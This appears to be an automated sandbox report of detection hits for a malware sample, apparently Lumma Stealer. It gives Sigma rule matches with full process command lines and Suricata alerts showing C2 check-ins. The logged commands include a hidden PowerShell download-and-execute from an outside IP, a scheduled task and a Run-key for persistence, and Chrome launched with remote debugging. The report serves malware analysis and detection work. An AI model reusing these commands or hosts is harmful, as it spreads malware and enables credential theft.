Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe, ParentProcessId: 6964, ParentProcessName: 9db7f37142.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, ProcessId: 4744, ProcessName: mshta.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4744, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, ProcessId: 3616, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe, ParentProcessId: 6964, ParentProcessName: 9db7f37142.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, ProcessId: 4744, ProcessName: mshta.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe", ParentImage: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe, ParentProcessId: 3668, ParentProcessName: 7aencsM.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7160, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 5588, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9db7f37142.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3616, TargetFilename: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4744, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, ProcessId: 3616, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6184, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 3848, ProcessName: schtasks.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4744, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, ProcessId: 3616, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4744, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, ProcessId: 3616, ProcessName: powershell.exe

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 6164, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2284, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Powershell download and execute file

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4744, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, ProcessId: 3616, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:11.162485+0100	2028371	3	Unknown Traffic	192.168.2.9	64638	172.67.150.155	443	TCP
2025-02-18T07:34:11.805909+0100	2028371	3	Unknown Traffic	192.168.2.9	64641	172.67.150.155	443	TCP
2025-02-18T07:34:13.640585+0100	2028371	3	Unknown Traffic	192.168.2.9	64645	172.67.150.155	443	TCP
2025-02-18T07:34:14.703987+0100	2028371	3	Unknown Traffic	192.168.2.9	64646	172.67.150.155	443	TCP
2025-02-18T07:34:16.343959+0100	2028371	3	Unknown Traffic	192.168.2.9	64647	172.67.150.155	443	TCP
2025-02-18T07:34:17.562883+0100	2028371	3	Unknown Traffic	192.168.2.9	64650	172.67.150.155	443	TCP
2025-02-18T07:34:19.581946+0100	2028371	3	Unknown Traffic	192.168.2.9	64652	104.21.60.59	443	TCP
2025-02-18T07:34:19.587494+0100	2028371	3	Unknown Traffic	192.168.2.9	64653	172.67.150.155	443	TCP
2025-02-18T07:34:20.217738+0100	2028371	3	Unknown Traffic	192.168.2.9	64655	104.21.60.59	443	TCP
2025-02-18T07:34:21.755668+0100	2028371	3	Unknown Traffic	192.168.2.9	64660	172.67.150.155	443	TCP
2025-02-18T07:34:21.833377+0100	2028371	3	Unknown Traffic	192.168.2.9	64661	104.21.60.59	443	TCP
2025-02-18T07:34:23.073665+0100	2028371	3	Unknown Traffic	192.168.2.9	64662	104.21.60.59	443	TCP
2025-02-18T07:34:25.176579+0100	2028371	3	Unknown Traffic	192.168.2.9	64666	104.21.60.59	443	TCP
2025-02-18T07:34:26.732573+0100	2028371	3	Unknown Traffic	192.168.2.9	64669	104.21.60.59	443	TCP
2025-02-18T07:34:28.291225+0100	2028371	3	Unknown Traffic	192.168.2.9	64671	104.21.60.59	443	TCP
2025-02-18T07:34:29.271273+0100	2028371	3	Unknown Traffic	192.168.2.9	64672	188.114.96.3	443	TCP
2025-02-18T07:34:30.415757+0100	2028371	3	Unknown Traffic	192.168.2.9	64673	104.21.60.59	443	TCP
2025-02-18T07:34:30.684093+0100	2028371	3	Unknown Traffic	192.168.2.9	64675	188.114.96.3	443	TCP
2025-02-18T07:34:31.903160+0100	2028371	3	Unknown Traffic	192.168.2.9	64679	188.114.96.3	443	TCP
2025-02-18T07:34:33.121364+0100	2028371	3	Unknown Traffic	192.168.2.9	64680	188.114.96.3	443	TCP
2025-02-18T07:34:34.473732+0100	2028371	3	Unknown Traffic	192.168.2.9	64683	188.114.96.3	443	TCP
2025-02-18T07:34:36.021525+0100	2028371	3	Unknown Traffic	192.168.2.9	64686	188.114.96.3	443	TCP
2025-02-18T07:34:43.138524+0100	2028371	3	Unknown Traffic	192.168.2.9	64696	188.114.96.3	443	TCP
2025-02-18T07:34:45.690104+0100	2028371	3	Unknown Traffic	192.168.2.9	64701	188.114.96.3	443	TCP
2025-02-18T07:35:07.281921+0100	2028371	3	Unknown Traffic	192.168.2.9	64757	172.67.150.155	443	TCP
2025-02-18T07:35:08.651852+0100	2028371	3	Unknown Traffic	192.168.2.9	64774	172.67.150.155	443	TCP
2025-02-18T07:35:12.158530+0100	2028371	3	Unknown Traffic	192.168.2.9	64790	172.67.150.155	443	TCP
2025-02-18T07:35:13.854217+0100	2028371	3	Unknown Traffic	192.168.2.9	64797	172.67.150.155	443	TCP
2025-02-18T07:35:15.268034+0100	2028371	3	Unknown Traffic	192.168.2.9	64812	172.67.150.155	443	TCP
2025-02-18T07:35:17.014249+0100	2028371	3	Unknown Traffic	192.168.2.9	64823	172.67.150.155	443	TCP
2025-02-18T07:35:17.123355+0100	2028371	3	Unknown Traffic	192.168.2.9	64825	104.21.48.1	443	TCP
2025-02-18T07:35:18.371660+0100	2028371	3	Unknown Traffic	192.168.2.9	64830	104.21.48.1	443	TCP
2025-02-18T07:35:21.343409+0100	2028371	3	Unknown Traffic	192.168.2.9	64831	104.21.48.1	443	TCP
2025-02-18T07:35:21.375405+0100	2028371	3	Unknown Traffic	192.168.2.9	64832	188.114.96.3	443	TCP
2025-02-18T07:35:22.538984+0100	2028371	3	Unknown Traffic	192.168.2.9	64834	188.114.96.3	443	TCP
2025-02-18T07:35:22.921801+0100	2028371	3	Unknown Traffic	192.168.2.9	64835	172.67.150.155	443	TCP
2025-02-18T07:35:22.944169+0100	2028371	3	Unknown Traffic	192.168.2.9	64836	104.21.48.1	443	TCP
2025-02-18T07:35:24.972670+0100	2028371	3	Unknown Traffic	192.168.2.9	64839	104.21.48.1	443	TCP
2025-02-18T07:35:25.270904+0100	2028371	3	Unknown Traffic	192.168.2.9	64840	172.67.150.155	443	TCP
2025-02-18T07:35:26.551908+0100	2028371	3	Unknown Traffic	192.168.2.9	64842	104.21.48.1	443	TCP
2025-02-18T07:35:26.562581+0100	2028371	3	Unknown Traffic	192.168.2.9	64841	188.114.96.3	443	TCP
2025-02-18T07:35:26.725133+0100	2028371	3	Unknown Traffic	192.168.2.9	64844	104.21.60.59	443	TCP
2025-02-18T07:35:27.368999+0100	2028371	3	Unknown Traffic	192.168.2.9	64846	104.21.60.59	443	TCP
2025-02-18T07:35:27.751337+0100	2028371	3	Unknown Traffic	192.168.2.9	64847	188.114.96.3	443	TCP
2025-02-18T07:35:28.657596+0100	2028371	3	Unknown Traffic	192.168.2.9	64849	104.21.48.1	443	TCP
2025-02-18T07:35:28.890616+0100	2028371	3	Unknown Traffic	192.168.2.9	64850	104.21.60.59	443	TCP
2025-02-18T07:35:29.069743+0100	2028371	3	Unknown Traffic	192.168.2.9	64851	188.114.96.3	443	TCP
2025-02-18T07:35:30.053688+0100	2028371	3	Unknown Traffic	192.168.2.9	64852	104.21.60.59	443	TCP
2025-02-18T07:35:30.431168+0100	2028371	3	Unknown Traffic	192.168.2.9	64853	188.114.96.3	443	TCP
2025-02-18T07:35:30.850742+0100	2028371	3	Unknown Traffic	192.168.2.9	64854	104.21.48.1	443	TCP
2025-02-18T07:35:31.505823+0100	2028371	3	Unknown Traffic	192.168.2.9	64855	104.21.60.59	443	TCP
2025-02-18T07:35:31.981510+0100	2028371	3	Unknown Traffic	192.168.2.9	64856	104.21.48.1	443	TCP
2025-02-18T07:35:32.921405+0100	2028371	3	Unknown Traffic	192.168.2.9	64858	104.21.48.1	443	TCP
2025-02-18T07:35:33.090861+0100	2028371	3	Unknown Traffic	192.168.2.9	64859	104.21.60.59	443	TCP
2025-02-18T07:35:34.644107+0100	2028371	3	Unknown Traffic	192.168.2.9	64860	188.114.96.3	443	TCP
2025-02-18T07:35:34.798354+0100	2028371	3	Unknown Traffic	192.168.2.9	64861	104.21.48.1	443	TCP
2025-02-18T07:35:35.249732+0100	2028371	3	Unknown Traffic	192.168.2.9	64862	104.21.60.59	443	TCP
2025-02-18T07:35:36.006892+0100	2028371	3	Unknown Traffic	192.168.2.9	64863	104.21.48.1	443	TCP
2025-02-18T07:35:37.268236+0100	2028371	3	Unknown Traffic	192.168.2.9	64865	104.21.48.1	443	TCP
2025-02-18T07:35:37.519431+0100	2028371	3	Unknown Traffic	192.168.2.9	64867	104.21.60.59	443	TCP
2025-02-18T07:35:38.596890+0100	2028371	3	Unknown Traffic	192.168.2.9	64868	104.21.48.1	443	TCP
2025-02-18T07:35:39.917813+0100	2028371	3	Unknown Traffic	192.168.2.9	64870	188.114.96.3	443	TCP
2025-02-18T07:35:40.614295+0100	2028371	3	Unknown Traffic	192.168.2.9	64871	104.21.48.1	443	TCP
2025-02-18T07:35:42.735331+0100	2028371	3	Unknown Traffic	192.168.2.9	64872	104.21.48.1	443	TCP

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:34.153799+0100	2028765	3	Unknown Traffic	192.168.2.9	64681	5.75.210.149	443	TCP
2025-02-18T07:34:35.328197+0100	2028765	3	Unknown Traffic	192.168.2.9	64684	5.75.210.149	443	TCP
2025-02-18T07:34:36.744198+0100	2028765	3	Unknown Traffic	192.168.2.9	64688	5.75.210.149	443	TCP
2025-02-18T07:34:38.180608+0100	2028765	3	Unknown Traffic	192.168.2.9	64689	5.75.210.149	443	TCP
2025-02-18T07:34:39.508149+0100	2028765	3	Unknown Traffic	192.168.2.9	64692	5.75.210.149	443	TCP
2025-02-18T07:34:40.849306+0100	2028765	3	Unknown Traffic	192.168.2.9	64694	5.75.210.149	443	TCP
2025-02-18T07:34:41.979778+0100	2028765	3	Unknown Traffic	192.168.2.9	64695	5.75.210.149	443	TCP
2025-02-18T07:34:43.337536+0100	2028765	3	Unknown Traffic	192.168.2.9	64697	5.75.210.149	443	TCP
2025-02-18T07:34:52.052861+0100	2028765	3	Unknown Traffic	192.168.2.9	64723	5.75.210.149	443	TCP
2025-02-18T07:34:53.382568+0100	2028765	3	Unknown Traffic	192.168.2.9	64729	5.75.210.149	443	TCP
2025-02-18T07:34:54.737428+0100	2028765	3	Unknown Traffic	192.168.2.9	64730	5.75.210.149	443	TCP
2025-02-18T07:34:55.921769+0100	2028765	3	Unknown Traffic	192.168.2.9	64731	5.75.210.149	443	TCP
2025-02-18T07:34:56.926971+0100	2028765	3	Unknown Traffic	192.168.2.9	64733	5.75.210.149	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:11.326855+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64638	172.67.150.155	443	TCP
2025-02-18T07:34:12.398837+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64641	172.67.150.155	443	TCP
2025-02-18T07:34:19.741367+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64652	104.21.60.59	443	TCP
2025-02-18T07:34:20.725906+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64655	104.21.60.59	443	TCP
2025-02-18T07:34:22.218127+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64660	172.67.150.155	443	TCP
2025-02-18T07:34:30.212282+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64672	188.114.96.3	443	TCP
2025-02-18T07:34:30.752584+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64673	104.21.60.59	443	TCP
2025-02-18T07:34:31.214417+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64675	188.114.96.3	443	TCP
2025-02-18T07:34:46.291652+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64701	188.114.96.3	443	TCP
2025-02-18T07:35:07.735618+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64757	172.67.150.155	443	TCP
2025-02-18T07:35:09.220094+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64774	172.67.150.155	443	TCP
2025-02-18T07:35:17.755463+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64825	104.21.48.1	443	TCP
2025-02-18T07:35:19.033016+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64830	104.21.48.1	443	TCP
2025-02-18T07:35:21.777043+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64832	188.114.96.3	443	TCP
2025-02-18T07:35:23.153353+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64834	188.114.96.3	443	TCP
2025-02-18T07:35:25.756663+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64840	172.67.150.155	443	TCP
2025-02-18T07:35:26.855050+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64844	104.21.60.59	443	TCP
2025-02-18T07:35:27.850424+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64846	104.21.60.59	443	TCP
2025-02-18T07:35:31.503361+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64854	104.21.48.1	443	TCP
2025-02-18T07:35:32.422252+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64856	104.21.48.1	443	TCP
2025-02-18T07:35:33.438647+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64858	104.21.48.1	443	TCP
2025-02-18T07:35:37.979098+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64867	104.21.60.59	443	TCP
2025-02-18T07:35:40.417594+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64870	188.114.96.3	443	TCP
2025-02-18T07:35:43.196785+0100	2054653	1	A Network Trojan was detected	192.168.2.9	64872	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:11.326855+0100	2049836	1	A Network Trojan was detected	192.168.2.9	64638	172.67.150.155	443	TCP
2025-02-18T07:34:19.741367+0100	2049836	1	A Network Trojan was detected	192.168.2.9	64652	104.21.60.59	443	TCP
2025-02-18T07:34:30.212282+0100	2049836	1	A Network Trojan was detected	192.168.2.9	64672	188.114.96.3	443	TCP
2025-02-18T07:35:07.735618+0100	2049836	1	A Network Trojan was detected	192.168.2.9	64757	172.67.150.155	443	TCP
2025-02-18T07:35:17.755463+0100	2049836	1	A Network Trojan was detected	192.168.2.9	64825	104.21.48.1	443	TCP
2025-02-18T07:35:21.777043+0100	2049836	1	A Network Trojan was detected	192.168.2.9	64832	188.114.96.3	443	TCP
2025-02-18T07:35:26.855050+0100	2049836	1	A Network Trojan was detected	192.168.2.9	64844	104.21.60.59	443	TCP
2025-02-18T07:35:32.422252+0100	2049836	1	A Network Trojan was detected	192.168.2.9	64856	104.21.48.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:19.581946+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64652	104.21.60.59	443	TCP
2025-02-18T07:34:20.217738+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64655	104.21.60.59	443	TCP
2025-02-18T07:34:21.833377+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64661	104.21.60.59	443	TCP
2025-02-18T07:34:23.073665+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64662	104.21.60.59	443	TCP
2025-02-18T07:34:25.176579+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64666	104.21.60.59	443	TCP
2025-02-18T07:34:26.732573+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64669	104.21.60.59	443	TCP
2025-02-18T07:34:28.291225+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64671	104.21.60.59	443	TCP
2025-02-18T07:34:30.415757+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64673	104.21.60.59	443	TCP
2025-02-18T07:35:26.725133+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64844	104.21.60.59	443	TCP
2025-02-18T07:35:27.368999+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64846	104.21.60.59	443	TCP
2025-02-18T07:35:28.890616+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64850	104.21.60.59	443	TCP
2025-02-18T07:35:30.053688+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64852	104.21.60.59	443	TCP
2025-02-18T07:35:31.505823+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64855	104.21.60.59	443	TCP
2025-02-18T07:35:33.090861+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64859	104.21.60.59	443	TCP
